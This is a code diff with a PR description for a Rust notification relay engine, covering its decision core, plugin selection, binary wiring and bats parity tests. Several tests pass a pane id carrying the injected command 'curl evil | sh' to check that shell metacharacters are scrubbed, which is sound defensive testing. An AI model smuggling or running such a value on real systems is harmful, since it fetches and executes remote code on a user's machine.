+    todo!("R2d: compose the decision core over the probe seams")
+}
+
+/// One leg's event, as the JSON object the channel contract specifies.
+/// The pane is the SANITIZED one: an unsafe id was already dropped.
+#[allow(clippy::too_many_arguments)]
+pub fn event_json(
+    agent: &str,
+    state: &str,
+    project: &str,
+    branch: &str,
+    detail: &str,
+    title: &str,
+    message: &str,
+    preview: &str,
+    pane: &str,
+    mode: &str,
+) -> String {
+    let _ = (
+        agent, state, project, branch, detail, title, message, preview, pane, mode,
+    );
+    todo!("R2d: the channel contract's JSON object")
+}
+
+#[cfg(test)]
+mod tests {
+    use super::{Decision, Overrides, decide, event_json};
+    use crate::config::parse_config;
+    use crate::probes::{FocusedPaneProbe, IdleProbe, MoshRateProbe, PhoneMarkerProbe};
+    use crate::registry::{Registry, Routing, Selection};
+    use std::cell::Cell;
+    use std::collections::BTreeMap;
+
+    /// Recording probes: every reading is counted, so a test can pin that a
+    /// probe was never consulted, not only what the verdict was.
+    #[derive(Default)]
+    struct CountingProbes {
+        idle: Option<u64>,
+        marker_mtime: Option<u64>,
+        sample: Option<String>,
+        focused: Option<String>,
+        idle_reads: Cell<u32>,
+        marker_reads: Cell<u32>,
+        sample_reads: Cell<u32>,
+        focused_reads: Cell<u32>,
+    }
+
+    impl IdleProbe for CountingProbes {
+        fn idle_secs(&self) -> Option<u64> {
+            self.idle_reads.set(self.idle_reads.get() + 1);
+            self.idle
+        }
+    }
+    impl PhoneMarkerProbe for CountingProbes {
+        fn marker_mtime_secs(&self) -> Option<u64> {
+            self.marker_reads.set(self.marker_reads.get() + 1);
+            self.marker_mtime
+        }
+    }
+    impl MoshRateProbe for CountingProbes {
+        fn sample_csv(&self) -> Option<String> {
+            self.sample_reads.set(self.sample_reads.get() + 1);
+            self.sample.clone()
+        }
+    }
+    impl FocusedPaneProbe for CountingProbes {
+        fn focused_pane(&self) -> Option<String> {
+            self.focused_reads.set(self.focused_reads.get() + 1);
+            self.focused.clone()
+        }
+    }
+
+    fn three_selection() -> Selection {
+        let mut registry = Registry::new();
+        registry
+            .register(
+                "moshi",
+                Routing {
+                    local: false,
+                    presence_gated: true,
+                    durable: false,
+                },
+            )
+            .unwrap();
+        registry
+            .register(
+                "hermes",
+                Routing {
+                    local: false,
+                    presence_gated: false,
+                    durable: true,
+                },
+            )
+            .unwrap();
+        registry
+            .register(
+                "macos-banner",
+                Routing {
+                    local: true,
+                    presence_gated: false,
+                    durable: false,
+                },
+            )
+            .unwrap();
+        registry
+            .enabled(
+                &parse_config(
+                    "[plugins.moshi]\nenabled = true\n[plugins.hermes]\nenabled = true\n[plugins.macos-banner]\nenabled = true\n",
+                )
+                .unwrap(),
+            )
+            .unwrap()
+    }
+
+    fn names(decision: &Decision) -> Vec<&str> {
+        decision.legs.iter().map(|leg| leg.name).collect()
+    }
+
+    // --- caller intent ------------------------------------------------------
+
+    #[test]
+    fn skip_phone_beats_force_phone_because_already_sent_is_more_specific() {
+        let probes = CountingProbes::default();
+        let overrides = Overrides {
+            skip_phone: true,
+            force_phone: true,
+            ..Overrides::default()
+        };
+        let decision = decide(
+            &probes,
+            &three_selection(),
+            &overrides,
+            false,
+            false,
+            "",
+            Some(1_000_000),
+        );
+        assert_eq!(names(&decision), vec!["hermes", "macos-banner"]);
+    }
+
+    #[test]
+    fn a_decided_phone_leg_never_pays_for_the_idle_probe() {
+        // Force, skip, and an idle override each decide the verdict without
+        // the reading; the probe is an unbounded pipe on a path that must
+        // never stall for an answer it cannot use.
+        for overrides in [
+            Overrides {
+                force_phone: true,
+                ..Overrides::default()
+            },
+            Overrides {
+                skip_phone: true,
+                ..Overrides::default()
+            },
+            Overrides {
+                idle_secs: Some(99_999),
+                ..Overrides::default()
+            },
+        ] {
+            let probes = CountingProbes::default();
+            decide(
+                &probes,
+                &three_selection(),
+                &overrides,
+                false,
+                false,
+                "",
+                Some(1_000_000),
+            );
+            assert_eq!(probes.idle_reads.get(), 0, "overrides: {overrides:?}");
+        }
+    }
+
+    #[test]
+    fn a_narrowing_flag_skips_the_idle_probe_too() {
+        for (local, remote) in [(true, false), (false, true)] {
+            let probes = CountingProbes::default();
+            decide(
+                &probes,
+                &three_selection(),
+                &Overrides::default(),
+                local,
+                remote,
+                "",
+                Some(1_000_000),
+            );
+            assert_eq!(probes.idle_reads.get(), 0);
+        }
+    }
+
+    // --- the attention override ---------------------------------------------
+
+    #[test]
+    fn in_the_band_a_fresh_marker_flips_the_desk_verdict_to_away() {
+        // Idle 60 with desk 120 reads "at the desk"; the Back Tap marker
+        // touched 10 seconds ago proves the phone is in hand, so the phone
+        // leg fires anyway.
+        let probes = CountingProbes {
+            idle: Some(60),
+            marker_mtime: Some(999_990),
+            ..CountingProbes::default()
+        };
+        let decision = decide(
+            &probes,
+            &three_selection(),
+            &Overrides::default(),
+            false,
+            false,
+            "",
+            Some(1_000_000),
+        );
+        assert_eq!(names(&decision), vec!["moshi", "hermes", "macos-banner"]);
+    }
+
+    #[test]
+    fn below_the_band_the_attention_probes_are_never_consulted() {
+        // A keypress 5 seconds ago proves where the hands are; no marker or
+        // byte-rate reading may overrule it, so neither is taken.
+        let probes = CountingProbes {
+            idle: Some(5),
+            marker_mtime: Some(999_999),
+            ..CountingProbes::default()
+        };
+        let decision = decide(
+            &probes,
+            &three_selection(),
+            &Overrides::default(),
+            false,
+            false,
+            "",
+            Some(1_000_000),
+        );
+        assert_eq!(names(&decision), vec!["hermes", "macos-banner"]);
+        assert_eq!(probes.marker_reads.get(), 0);
+        assert_eq!(probes.sample_reads.get(), 0);
+    }
+
+    #[test]
+    fn an_unreadable_clock_fails_the_marker_check_closed_but_never_the_push_itself() {
+        // now_secs None: the marker cannot be judged fresh, so no attention
+        // override fires; the ordinary away rule still pushes on its own.
+        let probes = CountingProbes {
+            idle: Some(60),
+            marker_mtime: Some(999_990),
+            ..CountingProbes::default()
+        };
+        let decision = decide(
+            &probes,
+            &three_selection(),
+            &Overrides::default(),
+            false,
+            false,
+            "",
+            None,
+        );
+        assert_eq!(names(&decision), vec!["hermes", "macos-banner"]);
+    }
+
+    // --- viewed-pane suppression --------------------------------------------
+
+    #[test]
+    fn the_watched_pane_suppresses_only_the_phone_leg() {
+        let probes = CountingProbes {
+            idle: Some(900),
+            focused: Some("wW:p21".to_string()),
+            ..CountingProbes::default()
+        };
+        let overrides = Overrides {
+            moshi_viewing: Some(true),
+            ..Overrides::default()
+        };
+        let decision = decide(
+            &probes,
+            &three_selection(),
+            &overrides,
+            false,
+            false,
+            "wW:p21",
+            Some(1_000_000),
+        );
+        assert_eq!(names(&decision), vec!["hermes", "macos-banner"]);
+    }
+
+    #[test]
+    fn force_phone_exempts_the_event_from_viewed_pane_suppression() {
+        let probes = CountingProbes {
+            focused: Some("wW:p21".to_string()),
+            ..CountingProbes::default()
+        };
+        let overrides = Overrides {
+            force_phone: true,
+            moshi_viewing: Some(true),
+            ..Overrides::default()
+        };
+        let decision = decide(
+            &probes,
+            &three_selection(),
+            &overrides,
+            false,
+            false,
+            "wW:p21",
+            Some(1_000_000),
+        );
+        assert!(names(&decision).contains(&"moshi"));
+    }
+
+    #[test]
+    fn a_different_focused_pane_never_pays_for_the_viewing_sample() {
+        // The one-second sample runs only when the panes already match.
+        let probes = CountingProbes {
+            idle: Some(900),
+            focused: Some("wW:p7".to_string()),
+            ..CountingProbes::default()
+        };
+        let decision = decide(
+            &probes,
+            &three_selection(),
+            &Overrides::default(),
+            false,
+            false,
+            "wW:p21",
+            Some(1_000_000),
+        );
+        assert!(names(&decision).contains(&"moshi"));
+        assert_eq!(probes.sample_reads.get(), 0);
+    }
+
+    // --- pane safety and the event ------------------------------------------
+
+    #[test]
+    fn an_unsafe_pane_is_dropped_once_for_every_channel() {
+        let probes = CountingProbes {
+            idle: Some(900),
+            ..CountingProbes::default()
+        };
+        let decision = decide(
+            &probes,
+            &three_selection(),
+            &Overrides::default(),
+            false,
+            false,
+            "wW:p21; curl evil | sh",
+            Some(1_000_000),
+        );
+        assert!(decision.pane_dropped);
+    }
+
+    #[test]
+    fn a_safe_pane_is_not_dropped() {
+        let probes = CountingProbes {
+            idle: Some(900),
+            ..CountingProbes::default()
+        };
+        let decision = decide(
+            &probes,
+            &three_selection(),
+            &Overrides::default(),
+            false,
+            false,
+            "wW:p21",
+            Some(1_000_000),
+        );
+        assert!(!decision.pane_dropped);
+    }
+
+    #[test]
+    fn the_event_is_the_channel_contracts_json_object() {
+        let event = event_json(
+            "claude",
+            "done",
+            "dotfiles",
+            "main",
+            "a \"quoted\" detail",
+            "claude done: dotfiles",
+            "main: a detail",
+            "a preview",
+            "wW:p21",
+            "async",
+        );
+        let parsed: serde_json::Value = serde_json::from_str(&event).unwrap();
+        assert_eq!(parsed["agent"], "claude");
+        assert_eq!(parsed["detail"], "a \"quoted\" detail");
+        assert_eq!(parsed["pane"], "wW:p21");
+        assert_eq!(parsed["mode"], "async");
+        assert_eq!(parsed["title"], "claude done: dotfiles");
+    }
+
+    // --- overrides parsing --------------------------------------------------
+
+    #[test]
+    fn a_garbage_numeric_override_reads_as_absent_never_zero() {
+        // Zero idle reads as "actively typing" and suppresses the push; a
+        // garbled value must instead leave the probe to answer.
+        let vars = BTreeMap::from([
+            ("RELAY_IDLE_SECS".to_string(), "not-a-number".to_string()),
+            ("RELAY_DESK_IDLE_SECS".to_string(), "120".to_string()),
+        ]);
+        let overrides = Overrides::from_env(&vars);
+        assert_eq!(overrides.idle_secs, None);
+        assert_eq!(overrides.desk_idle_secs, Some(120));
+    }
+
+    #[test]
+    fn skip_and_force_parse_from_their_relay_variables() {
+        let vars = BTreeMap::from([
+            ("RELAY_SKIP_PHONE".to_string(), "1".to_string()),
+            ("RELAY_FORCE_PHONE".to_string(), "1".to_string()),
+        ]);
+        let overrides = Overrides::from_env(&vars);
+        assert!(overrides.skip_phone);
+        assert!(overrides.force_phone);
+    }
+}

--- a/dot_local/share/pns/src/engine.rs
+++ b/dot_local/share/pns/src/engine.rs
@@ -182,6 +182,24 @@ where
     }
 }
 
+/// Which plugins run, given what loading the config found. The composition
+/// policy in one place:
+///
+/// A LOADED config is authoritative. A MISSING config selects every built-in,
+/// so the cutover from the bash engine changes nothing until an operator
+/// opts in by writing one. A BROKEN config (unreadable, malformed, invalid,
+/// or naming an unknown plugin) is LOUD, the returned warning, but still
+/// selects every built-in: on an always-exit-0 notification path, a config
+/// error that silently turned every notification off would be the exact
+/// failure the config layer exists to refuse.
+pub fn select_plugins(
+    registry: &crate::registry::Registry,
+    loaded: Result<crate::config::LoadOutcome, crate::config::ConfigError>,
+) -> (Selection, Option<String>) {
+    let _ = (registry, loaded);
+    todo!("R2d: loaded is authoritative, missing is the roster, broken is loud plus the roster")
+}
+
 /// One leg's event, as the JSON object the channel contract specifies.
 /// The pane is the SANITIZED one: an unsafe id was already dropped.
 #[allow(clippy::too_many_arguments)]
@@ -573,6 +591,100 @@ mod tests {
         assert_eq!(parsed["pane"], "wW:p21");
         assert_eq!(parsed["mode"], "async");
         assert_eq!(parsed["title"], "claude done: dotfiles");
+    }
+
+    // --- plugin selection at the composition root ---------------------------
+
+    fn three_registry() -> Registry {
+        let mut registry = Registry::new();
+        registry
+            .register(
+                "moshi",
+                Routing {
+                    local: false,
+                    presence_gated: true,
+                    durable: false,
+                },
+            )
+            .unwrap();
+        registry
+            .register(
+                "hermes",
+                Routing {
+                    local: false,
+                    presence_gated: false,
+                    durable: true,
+                },
+            )
+            .unwrap();
+        registry
+            .register(
+                "macos-banner",
+                Routing {
+                    local: true,
+                    presence_gated: false,
+                    durable: false,
+                },
+            )
+            .unwrap();
+        registry
+    }
+
+    fn selection_names(selection: &Selection) -> Vec<&str> {
+        selection.iter().map(|r| r.name).collect()
+    }
+
+    #[test]
+    fn a_missing_config_selects_every_builtin_so_the_cutover_changes_nothing() {
+        use crate::config::LoadOutcome;
+        let (selection, warning) =
+            super::select_plugins(&three_registry(), Ok(LoadOutcome::Missing));
+        assert_eq!(
+            selection_names(&selection),
+            vec!["moshi", "hermes", "macos-banner"]
+        );
+        assert_eq!(warning, None);
+    }
+
+    #[test]
+    fn a_loaded_config_is_authoritative() {
+        use crate::config::LoadOutcome;
+        let config = parse_config("[plugins.hermes]\nenabled = true\n").unwrap();
+        let (selection, warning) =
+            super::select_plugins(&three_registry(), Ok(LoadOutcome::Loaded(config)));
+        assert_eq!(selection_names(&selection), vec!["hermes"]);
+        assert_eq!(warning, None);
+    }
+
+    #[test]
+    fn a_broken_config_is_loud_but_never_turns_notifications_off() {
+        use crate::config::ConfigError;
+        let (selection, warning) = super::select_plugins(
+            &three_registry(),
+            Err(ConfigError::Malformed(
+                "key with no value at line 1".to_string(),
+            )),
+        );
+        assert_eq!(
+            selection_names(&selection),
+            vec!["moshi", "hermes", "macos-banner"]
+        );
+        let warning = warning.expect("a broken config must be said aloud");
+        assert!(warning.contains("key with no value"));
+    }
+
+    #[test]
+    fn a_config_naming_an_unknown_plugin_is_loud_and_falls_back_to_the_roster() {
+        use crate::config::LoadOutcome;
+        let config = parse_config("[plugins.mosih]\nenabled = true\n").unwrap();
+        let (selection, warning) =
+            super::select_plugins(&three_registry(), Ok(LoadOutcome::Loaded(config)));
+        assert_eq!(
+            selection_names(&selection),
+            vec!["moshi", "hermes", "macos-banner"]
+        );
+        let warning = warning.expect("the typo'd name must be said aloud");
+        assert!(warning.contains("mosih"));
     }
 
     // --- overrides parsing --------------------------------------------------

--- a/dot_local/share/pns/src/lib.rs
+++ b/dot_local/share/pns/src/lib.rs
@@ -12,7 +12,9 @@
 //! decides what to do with a verdict, and the composition root is where
 //! wiring lives.
 
+pub mod args;
 pub mod config;
+pub mod engine;
 pub mod presence;
 pub mod probes;
 pub mod pulse;

--- a/dot_local/share/pns/src/main.rs
+++ b/dot_local/share/pns/src/main.rs
@@ -1,0 +1,146 @@
+//! The relay binary: the composition root, and the only place with a main.
+//!
+//! Everything here is WIRING. The registrations below are the roster, the
+//! environment and the config are read once at this edge, and every decision
+//! is delegated to the library. It exits 0 on every path, because a
+//! notification must never fail the work it reports on.
+
+use std::collections::BTreeMap;
+use std::io::Write;
+use std::path::Path;
+use std::process::{Command, Stdio};
+use std::time::{SystemTime, UNIX_EPOCH};
+
+use pns::args::parse_args;
+use pns::config::{config_path, load_config};
+use pns::engine::{Overrides, decide, event_json, select_plugins};
+use pns::registry::{Registry, Routing};
+use pns::render;
+use pns::system::{SystemCommandRunner, SystemProbes};
+
+fn main() {
+    let (event, warnings) = parse_args(std::env::args().skip(1));
+    for warning in &warnings {
+        eprintln!("relay: {warning}");
+    }
+
+    // THE ROSTER, and the only statement of delivery order. A destination is
+    // added here, never in policy.
+    let mut registry = Registry::new();
+    for (name, routing) in [
+        (
+            "moshi",
+            Routing {
+                local: false,
+                presence_gated: true,
+                durable: false,
+            },
+        ),
+        (
+            "hermes",
+            Routing {
+                local: false,
+                presence_gated: false,
+                durable: true,
+            },
+        ),
+        (
+            "macos-banner",
+            Routing {
+                local: true,
+                presence_gated: false,
+                durable: false,
+            },
+        ),
+    ] {
+        if let Err(error) = registry.register(name, routing) {
+            eprintln!("pns: {error:?}");
+        }
+    }
+
+    let home = std::env::var("HOME").unwrap_or_default();
+    let (selection, warning) = select_plugins(&registry, load_config(&config_path(&home)));
+    if let Some(warning) = warning {
+        eprintln!("{warning}");
+    }
+
+    let overrides = Overrides::from_env(&std::env::vars().collect::<BTreeMap<_, _>>());
+    let now_secs = SystemTime::now()
+        .duration_since(UNIX_EPOCH)
+        .ok()
+        .map(|since_epoch| since_epoch.as_secs());
+    let probes = SystemProbes::new(
+        SystemCommandRunner,
+        std::env::var("PNS_PHONE_MARKER_FILE")
+            .unwrap_or_else(|_| format!("{home}/.local/state/pns/phone-attention.marker")),
+    );
+
+    let decision = decide(
+        &probes,
+        &selection,
+        &overrides,
+        event.local_only,
+        event.remote_only,
+        &event.pane,
+        now_secs,
+    );
+
+    // Sanitized ONCE here rather than per channel: a channel may be written in
+    // any language and cannot be expected to share the guard.
+    let pane = if decision.pane_dropped {
+        eprintln!(
+            "relay: dropped a pane id with shell metacharacters; no channel will focus a pane"
+        );
+        ""
+    } else {
+        event.pane.as_str()
+    };
+
+    if decision.legs.is_empty() {
+        // A verdict that must be SAID, but only for the contradiction the
+        // caller asked for: a silent exit is indistinguishable from delivery.
+        if event.local_only && event.remote_only {
+            println!(
+                "relay: post SKIPPED -- --local-only and --remote-only were both given, which suppresses every channel; nothing was sent"
+            );
+        }
+        return;
+    }
+
+    let title = render::title(&event.agent, &event.state, &event.project);
+    let message = render::message(&event.branch, &event.detail, &event.state);
+    let preview = render::preview(&message);
+    let channels_dir = std::env::var("PNS_CHANNELS_DIR")
+        .unwrap_or_else(|_| format!("{home}/.local/libexec/pns/channels"));
+
+    for leg in &decision.legs {
+        deliver(
+            &Path::new(&channels_dir).join(format!("{}.sh", leg.name)),
+            &event_json(
+                &event.agent,
+                &event.state,
+                &event.project,
+                &event.branch,
+                &event.detail,
+                &title,
+                &message,
+                &preview,
+                pane,
+                leg.mode.as_str(),
+            ),
+        );
+    }
+}
+
+/// Hand one channel its event on stdin. A channel that is missing, is not
+/// executable, or fails is not an error: it is simply not installed, or it
+/// declined, and neither may take down the siblings or the caller.
+fn deliver(channel: &Path, event: &str) {
+    let Ok(mut child) = Command::new(channel).stdin(Stdio::piped()).spawn() else {
+        return;
+    };
+    if let Some(mut stdin) = child.stdin.take() {
+        let _ = stdin.write_all(event.as_bytes());
+    }
+    let _ = child.wait();
+}

--- a/dot_local/share/pns/src/main.rs
+++ b/dot_local/share/pns/src/main.rs
@@ -13,13 +13,20 @@ use std::time::{SystemTime, UNIX_EPOCH};
 
 use pns::args::parse_args;
 use pns::config::{config_path, load_config};
-use pns::engine::{Overrides, decide, event_json, select_plugins};
+use pns::engine::{Overrides, decide, event_json, resolve_path, select_plugins};
 use pns::registry::{Registry, Routing};
 use pns::render;
 use pns::system::{SystemCommandRunner, SystemProbes};
 
 fn main() {
-    let (event, warnings) = parse_args(std::env::args().skip(1));
+    // Lossy rather than validating: a stray byte in argv degrades into an
+    // unknown token, which the lenient contract already skips, instead of
+    // aborting an always-exit-0 notification.
+    let (event, warnings) = parse_args(
+        std::env::args_os()
+            .skip(1)
+            .map(|argument| argument.to_string_lossy().into_owned()),
+    );
     for warning in &warnings {
         eprintln!("relay: {warning}");
     }
@@ -64,15 +71,28 @@ fn main() {
         eprintln!("{warning}");
     }
 
-    let overrides = Overrides::from_env(&std::env::vars().collect::<BTreeMap<_, _>>());
+    let overrides = Overrides::from_env(
+        &std::env::vars_os()
+            .map(|(name, value)| {
+                (
+                    name.to_string_lossy().into_owned(),
+                    value.to_string_lossy().into_owned(),
+                )
+            })
+            .collect::<BTreeMap<_, _>>(),
+    );
     let now_secs = SystemTime::now()
         .duration_since(UNIX_EPOCH)
         .ok()
         .map(|since_epoch| since_epoch.as_secs());
     let probes = SystemProbes::new(
         SystemCommandRunner,
-        std::env::var("PNS_PHONE_MARKER_FILE")
-            .unwrap_or_else(|_| format!("{home}/.local/state/pns/phone-attention.marker")),
+        resolve_path(
+            std::env::var("PNS_PHONE_MARKER_FILE").ok().as_deref(),
+            &format!("{home}/.local/state/pns/phone-attention.marker"),
+        )
+        .to_string_lossy()
+        .into_owned(),
     );
 
     let decision = decide(
@@ -85,17 +105,6 @@ fn main() {
         now_secs,
     );
 
-    // Sanitized ONCE here rather than per channel: a channel may be written in
-    // any language and cannot be expected to share the guard.
-    let pane = if decision.pane_dropped {
-        eprintln!(
-            "relay: dropped a pane id with shell metacharacters; no channel will focus a pane"
-        );
-        ""
-    } else {
-        event.pane.as_str()
-    };
-
     if decision.legs.is_empty() {
         // A verdict that must be SAID, but only for the contradiction the
         // caller asked for: a silent exit is indistinguishable from delivery.
@@ -107,15 +116,29 @@ fn main() {
         return;
     }
 
+    // Sanitized ONCE here rather than per channel: a channel may be written in
+    // any language and cannot be expected to share the guard. Warned about
+    // only now, because a scrub nobody was going to receive is not news.
+    let pane = if decision.pane_dropped {
+        eprintln!(
+            "relay: dropped a pane id with shell metacharacters; no channel will focus a pane"
+        );
+        ""
+    } else {
+        event.pane.as_str()
+    };
+
     let title = render::title(&event.agent, &event.state, &event.project);
     let message = render::message(&event.branch, &event.detail, &event.state);
     let preview = render::preview(&message);
-    let channels_dir = std::env::var("PNS_CHANNELS_DIR")
-        .unwrap_or_else(|_| format!("{home}/.local/libexec/pns/channels"));
+    let channels_dir = resolve_path(
+        std::env::var("PNS_CHANNELS_DIR").ok().as_deref(),
+        &format!("{home}/.local/libexec/pns/channels"),
+    );
 
     for leg in &decision.legs {
         deliver(
-            &Path::new(&channels_dir).join(format!("{}.sh", leg.name)),
+            &channels_dir.join(format!("{}.sh", leg.name)),
             &event_json(
                 &event.agent,
                 &event.state,
@@ -140,7 +163,10 @@ fn deliver(channel: &Path, event: &str) {
         return;
     };
     if let Some(mut stdin) = child.stdin.take() {
+        // Newline-terminated, as the bash's `jq -cn` emitted it: a channel
+        // reading one line with `read -r` gets nothing without it.
         let _ = stdin.write_all(event.as_bytes());
+        let _ = stdin.write_all(b"\n");
     }
     let _ = child.wait();
 }

--- a/dot_local/share/pns/src/registry.rs
+++ b/dot_local/share/pns/src/registry.rs
@@ -91,6 +91,14 @@ impl Registry {
         self.registrations.iter().map(|entry| entry.name).collect()
     }
 
+    /// Every registration, for the machine with NO config file: the built-in
+    /// roster is the default, so the cutover from the bash engine changes
+    /// nothing until an operator writes a config, and a config that EXISTS
+    /// is authoritative precisely because writing one is the opt-in.
+    pub fn all(&self) -> Selection {
+        todo!("R2d: the unconfigured-machine selection")
+    }
+
     /// The registrations the config enables, in REGISTRATION order whatever
     /// order the config listed them in. A config naming an unregistered
     /// plugin is refused; a registered plugin the config omits or disables
@@ -213,6 +221,13 @@ mod tests {
             three_plugin_registry().enabled(&config),
             Err(RegistryError::UnknownPlugin("mosih".to_string()))
         );
+    }
+
+    #[test]
+    fn all_selects_every_registration_for_the_unconfigured_machine() {
+        let selection = three_plugin_registry().all();
+        let names: Vec<&str> = selection.iter().map(|r| r.name).collect();
+        assert_eq!(names, vec!["moshi", "hermes", "macos-banner"]);
     }
 
     #[test]

--- a/dot_local/share/pns/src/registry.rs
+++ b/dot_local/share/pns/src/registry.rs
@@ -96,7 +96,7 @@ impl Registry {
     /// nothing until an operator writes a config, and a config that EXISTS
     /// is authoritative precisely because writing one is the opt-in.
     pub fn all(&self) -> Selection {
-        todo!("R2d: the unconfigured-machine selection")
+        Selection(self.registrations.clone())
     }
 
     /// The registrations the config enables, in REGISTRATION order whatever

--- a/test/integration/pns-engine-binary-dispatch.sh
+++ b/test/integration/pns-engine-binary-dispatch.sh
@@ -1,0 +1,17 @@
+#!/usr/bin/env bash
+# The R2d differential gate as a standing check: the SAME dispatch assertions
+# that pin the bash engine must pass against the Rust engine binary, so a
+# broken or no-op binary fails the build instead of shipping behind a green
+# bash-only suite. HOME is isolated so a live operator config cannot change
+# the roster under the assertions.
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../.." && pwd)"
+
+scratch="$(mktemp -d)"
+trap 'rm -rf "$scratch"' EXIT
+
+cargo build --quiet --manifest-path "$REPO_ROOT/dot_local/share/pns/Cargo.toml"
+
+HOME="$scratch" PNS_RELAY_BIN="$REPO_ROOT/dot_local/share/pns/target/debug/pns" \
+  bats "$REPO_ROOT/test/unit/pns-channel-dispatch.bats"

--- a/test/unit/pns-channel-dispatch.bats
+++ b/test/unit/pns-channel-dispatch.bats
@@ -10,7 +10,10 @@
 
 setup() {
   REPO_ROOT="$(cd "$BATS_TEST_DIRNAME/../.." && pwd)"
-  RELAY="$REPO_ROOT/dot_local/libexec/pns/executable_relay.sh"
+  # PNS_RELAY_BIN points this suite at the Rust engine binary instead; the
+  # bash engine stays the default until R3d retires it. The same assertions
+  # against either engine is the R2d differential gate.
+  RELAY="${PNS_RELAY_BIN:-$REPO_ROOT/dot_local/libexec/pns/executable_relay.sh}"
   CHANNELS="$BATS_TEST_TMPDIR/channels"
   mkdir -p "$CHANNELS"
   # Stub channels record the event they were handed, then exit 0.

--- a/test/unit/pns-channel-dispatch.bats
+++ b/test/unit/pns-channel-dispatch.bats
@@ -193,3 +193,35 @@ mode_of() { jq -r '.mode' <"$BATS_TEST_TMPDIR/$1.event"; }
     "$RELAY" --agent claude --state done --detail x --pane wW:p1 >/dev/null 2>&1
   fired moshi
 }
+
+@test "a pane with shell metacharacters is scrubbed from every delivered event" {
+  relay --agent claude --state done --detail x --pane 'wW:p1; curl evil | sh'
+  fired macos-banner
+  run jq -r '.pane' "$BATS_TEST_TMPDIR/macos-banner.event"
+  [ "$output" = "" ]
+  grep -q 'dropped a pane id with shell metacharacters' "$BATS_TEST_TMPDIR/err"
+}
+
+@test "a scrub warning is not printed when no channel will run" {
+  relay --agent claude --state done --pane 'wW:p1; curl evil | sh' --local-only --remote-only
+  run grep -c 'dropped a pane id' "$BATS_TEST_TMPDIR/err"
+  [ "$output" = "0" ]
+}
+
+@test "a non-unicode argument never breaks the exit-0 edge" {
+  # The engine sits on an always-exit-0 path; a stray byte in argv must
+  # degrade like any unknown token, not abort the notification.
+  run env PNS_CHANNELS_DIR="$CHANNELS" RELAY_IDLE_SECS=99999 \
+    "$RELAY" $'\xff' --local-only --remote-only
+  [ "$status" -eq 0 ]
+  [[ "$output" == *SKIPPED* ]]
+}
+
+@test "the delivered event is newline-terminated for line-oriented channels" {
+  printf '#!/usr/bin/env bash\nset -e\nIFS= read -r event\nprintf %%s "$event" >"%s/line.event"\n' \
+    "$BATS_TEST_TMPDIR" >"$CHANNELS/hermes.sh"
+  chmod +x "$CHANNELS/hermes.sh"
+  relay --agent claude --state done --detail x
+  run jq -r '.agent' "$BATS_TEST_TMPDIR/line.event"
+  [ "$output" = "claude" ]
+}


### PR DESCRIPTION
## Context

With the probes (#172), the config layer (#173), and the registry (#174) merged, the pns crate had every part of an engine except the engine. This slice (R2d) builds it: the binary that will replace `dot_local/libexec/pns/executable_relay.sh`, wired through the registry so the four channel slices that follow each swap one executable spawn for native delivery without touching policy.

## Summary

- `dot_local/share/pns/src/args.rs` ports relay's lenient CLI contract: a recognized flag is never consumed as another flag's value, a dangling value flag warns and degrades, unknown tokens skip silently, and a non-UTF8 argument cannot break the always-exit-0 edge.
- `dot_local/share/pns/src/engine.rs` composes the decision core over the probe seams with two pinned properties: a probe runs only when its answer could matter (one idle read at most, attention probes confined to their band, the one-second sample never running once a marker, a forced verdict, a pane mismatch, or an all-ungated selection decided), and caller intent is never overridden (skip beats force, force exempts viewed-pane suppression).
- Present-but-garbled numeric overrides are refused the way the bash validators refuse them: unknown fails open into a push, never into a default threshold or a probe read.
- `dot_local/share/pns/src/main.rs` is the thin edge: config through the composition policy (a loaded config is authoritative, a missing one runs the full roster, a broken one is loud but never turns notifications off), then delivery through the channel executables with newline-terminated JSON events, empty-on-scrub pane ids, and exit 0 on every path.
- `test/unit/pns-channel-dispatch.bats` gains a `PNS_RELAY_BIN` override plus four new assertions, and `test/integration/pns-engine-binary-dispatch.sh` runs all 25 against the built binary under an isolated HOME on every CI run, so a broken binary fails the build while the bash engine stays the default until R3d retires it.

## How it was verified

- `cargo test`: 218 passed, 0 failed. `cargo clippy --all-targets`: zero warnings. `cargo fmt --check`: clean.
- The dispatch bats pass 25/25 against the bash engine and 25/25 against the Rust binary; the integration wrapper exits 0.
- Seventeen mutations were run with named-test kills and green controls, including probe-laziness deletions, precedence inversions, composition-policy corruptions, and main.rs wiring mutations caught through the bats differential.
- Hostile probes covered non-UTF8 argv and environment values, empty path variables, and garbled numeric overrides, each checked against the bash engine's behavior on the same input.

## Effect of merging

The crate now builds a `pns` binary, but nothing installs or invokes it: no LaunchAgent, hook, or producer references it yet, and the bash engine keeps running unchanged. CI gains the integration gate, which builds the binary on each run. The R3 slices are what repoint producers at it.

## Review guide

Read `src/engine.rs` first: `decide` is the whole decision surface and its module header states the two properties the counting-probe tests pin. Then `src/main.rs` (the edge: env handling, the composition policy, the executable dispatcher) and `src/args.rs` (mechanical port). The bats additions and the integration wrapper are small but load-bearing: they are what makes the binary's parity a standing check instead of a one-time claim. One deliberate deviation from bash: the pane-scrub warning prints once, and only when a channel will run, instead of bash's incidental per-channel repetition.
